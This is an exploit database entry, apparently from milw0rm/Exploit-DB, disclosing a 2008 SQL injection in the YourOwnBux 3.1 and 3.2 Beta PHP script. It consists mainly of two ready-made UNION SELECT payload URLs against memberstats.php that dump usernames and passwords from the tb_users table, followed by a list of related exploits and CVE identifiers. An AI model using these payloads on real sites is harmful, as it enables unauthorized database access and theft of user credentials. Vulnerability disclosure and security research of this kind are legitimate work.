YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability Author: ~!Dok_tOR!~ Date found: 28.08.08 Product: YourOwnBux Version: 3.1, 3.2 Price: $39.99 DEMO: yourownbux.com/demos/ Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off 3.2 Beta version Exploit: http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/* 3.1 version Exploit: http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/* # milw0rm.com [2008-08-27]
Related Exploits
Trying to match CVEs (1): CVE-2008-4093Trying to match OSVDBs (1): 48164
Other Possible E-DB Search Terms: Yourownbux 3.1/3.2 Beta, Yourownbux 3.1, Yourownbux
Date | D | V | Title | Author |
---|---|---|---|---|
2008-09-11 |
![]() |
Yourownbux 4.0 - 'cookie' Authentication Bypass | Tec-n0x | |
2008-10-07 |
![]() |
Yourownbux 4.0 - 'cookie' SQL Injection | Tec-n0x |